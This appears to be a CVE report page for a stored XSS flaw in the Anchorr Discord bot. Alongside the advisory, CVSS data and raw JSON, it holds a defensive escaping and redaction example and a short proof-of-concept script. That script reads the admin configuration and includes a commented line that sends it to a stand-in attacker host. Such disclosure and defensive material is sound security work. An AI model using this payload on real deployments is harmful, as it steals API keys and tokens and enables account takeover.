Security Vulnerability Report
CVE-2026-32891 CVSS 9.0 CRITICAL

Published: 2026-03-20 03:16:00
Last Modified: 2026-03-27 16:09:55

Description

Anchorr is a Discord bot for requesting movies and TV shows and receiving notifications when items are added to a media server. Versions 1.4.1 and below contain a stored XSS vulnerability in the Jellyseerr user selector, which allows any Jellyseerr account holder to execute arbitrary JavaScript in the Anchorr admin's browser session. The injected script calls the authenticated /api/config endpoint, which returns the full application configuration in plaintext. This allows the attacker to forge a valid Anchorr session token and gain full admin access to the dashboard with no knowledge of the admin password. The same response also exposes the API keys and tokens for every integrated service, resulting in simultaneous account takeover of the Jellyfin media server (via JELLYFIN_API_KEY), the Jellyseerr request manager (via JELLYSEERR_API_KEY), and the Discord bot (via DISCORD_TOKEN). This issue has been fixed in version 1.4.2.
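The two defensive fixes that break the chain described above, as an added JavaScript example that is not Anchorr's code: escaping user-controlled display names before they reach the admin's user selector, and masking secrets before a configuration object is served. The user and config shapes are assumptions; only the three secret names come from the advisory.

```javascript
// Added example, not Anchorr's own code: the two defensive fixes that close the
// chain described in the advisory. User and config shapes are assumptions; only
// the three secret names come from the advisory text.

// Map the five HTML-significant characters so a display name can never close
// a tag or attribute when interpolated into markup.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable form: raw Jellyseerr display names land in the admin's DOM.
function renderUserSelectorUnsafe(users) {
  const options = users.map((u) => `<option value="${u.id}">${u.displayName}</option>`);
  return `<select name="jellyseerrUser">${options.join('')}</select>`;
}

// Hardened form: every user-controlled field is escaped first.
function renderUserSelector(users) {
  const options = users.map(
    (u) => `<option value="${escapeHtml(u.id)}">${escapeHtml(u.displayName)}</option>`,
  );
  return `<select name="jellyseerrUser">${options.join('')}</select>`;
}

// Second fix (CWE-212): mask secrets before a config object is serialised for
// an endpoint like /api/config. Keys named in the advisory are always masked;
// other keys are masked when their name suggests a credential. Unset secrets
// stay visibly unset so an admin can still tell what is configured.
const SECRET_KEYS = new Set(['JELLYFIN_API_KEY', 'JELLYSEERR_API_KEY', 'DISCORD_TOKEN']);
const SECRET_NAME = /secret|token|password|api_?key/i;

function redactConfig(config) {
  const out = {};
  for (const [key, value] of Object.entries(config)) {
    const sensitive = SECRET_KEYS.has(key) || SECRET_NAME.test(key);
    out[key] = sensitive && value ? '[REDACTED]' : value;
  }
  return out;
}

// Constructed sample data (not from any real deployment).
const sampleUsers = [
  { id: 1, displayName: 'alice' },
  { id: 2, displayName: '<script>alert(1)</script>' },
];
const sampleConfig = { PORT: 3000, JELLYFIN_API_KEY: 'k1', DISCORD_TOKEN: '', SESSION_SECRET: 's' };
```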

CVSS Details

CVSS Score: 9.0
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H
Exploitability Score: 2.3
Impact Score: 6.0
Weaknesses: CWE-80, CWE-212, CWE-311

Configurations (Affected Products)

cpe:2.3:a:openvessl:anchorr:*:*:*:*:*:*:*:* - VULNERABLE
Anchorr <= 1.4.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```html
<!-- Proof of Concept for CVE-2026-32891 Stored XSS -->
<!-- Malicious payload injected into Jellyseerr user selector -->
<script>
  // This script executes in the admin's browser context
  (function () {
    // Fetch sensitive configuration from the internal API
    fetch('/api/config')
      .then((response) => response.json())
      .then((data) => {
        // Exfiltrate the stolen configuration (API keys, tokens)
        // In a real attack, data is sent to an attacker-controlled server
        console.log('[+] Exfiltrated Config:', JSON.stringify(data));
        // Example exfiltration:
        // fetch('https://attacker-server.com/collect', {
        //   method: 'POST',
        //   body: JSON.stringify(data)
        // });
      })
      .catch((err) => console.error(err));
  })();
</script>
```

References

https://github.com/openVESSL/Anchorr/releases/tag/v1.4.2 (Release Notes)
https://github.com/openVESSL/Anchorr/security/advisories/GHSA-6mg4-788h-7g9g (Vendor Advisory)

Raw JSON Data

```json
{"cve": {
  "id": "CVE-2026-32891",
  "sourceIdentifier": "[email protected]",
  "published": "2026-03-20T03:16:00.240",
  "lastModified": "2026-03-27T16:09:54.573",
  "vulnStatus": "Analyzed",
  "cveTags": [],
  "descriptions": [
    {"lang": "en", "value": "Anchorr is a Discord bot for requesting movies and TV shows and receiving notifications when items are added to a media server. Versions 1.4.1 and below contain a stored XSS vulnerability in the Jellyseerr user selector. Jellyseerr allows any account holder to execute arbitrary JavaScript in the Anchorr admin's browser session. The injected script calls the authenticated /api/config endpoint - which returns the full application configuration in plaintext. This allows the attacker to forge a valid Anchorr session token and gain full admin access to the dashboard with no knowledge of the admin password. The same response also exposes the API keys and tokens for every integrated service, resulting in simultaneous account takeover of the Jellyfin media server (via JELLYFIN_API_KEY), the Jellyseerr request manager (via JELLYSEERR_API_KEY), and the Discord bot (via DISCORD_TOKEN). This issue has been fixed in version 1.4.2."},
    {"lang": "es", "value": "Anchorr es un bot de Discord para solicitar películas y programas de TV y recibir notificaciones cuando se añaden elementos a un servidor de medios. Las versiones 1.4.1 e inferiores contienen una vulnerabilidad XSS almacenada en el selector de usuario de Jellyseerr. Jellyseerr permite a cualquier titular de cuenta ejecutar JavaScript arbitrario en la sesión del navegador del administrador de Anchorr. El script inyectado llama al endpoint autenticado /api/config - que devuelve la configuración completa de la aplicación en texto plano. Esto permite al atacante forjar un token de sesión de Anchorr válido y obtener acceso de administrador completo al panel de control sin conocimiento de la contraseña de administrador. La misma respuesta también expone las claves API y los tokens para cada servicio integrado, lo que resulta en la toma de control simultánea de la cuenta del servidor de medios Jellyfin (a través de JELLYFIN_API_KEY), del gestor de solicitudes Jellyseerr (a través de JELLYSEERR_API_KEY), y del bot de Discord (a través de DISCORD_TOKEN). Este problema ha sido solucionado en la versión 1.4.2."}
  ],
  "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H", "baseScore": 9.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.3, "impactScore": 6.0}]},
  "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-80"}, {"lang": "en", "value": "CWE-212"}, {"lang": "en", "value": "CWE-311"}]}],
  "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openvessl:anchorr:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.4.1", "matchCriteriaId": "584CDEBF-7E62-4732-A6FD-64B3384C3834"}]}]}],
  "references": [
    {"url": "https://github.com/openVESSL/Anchorr/releases/tag/v1.4.2", "source": "[email protected]", "tags": ["Release Notes"]},
    {"url": "https://github.com/openVESSL/Anchorr/security/advisories/GHSA-6mg4-788h-7g9g", "source": "[email protected]", "tags": ["Vendor Advisory"]},
    {"url": "https://github.com/openVESSL/Anchorr/security/advisories/GHSA-6mg4-788h-7g9g", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Vendor Advisory"]}
  ]
}}
```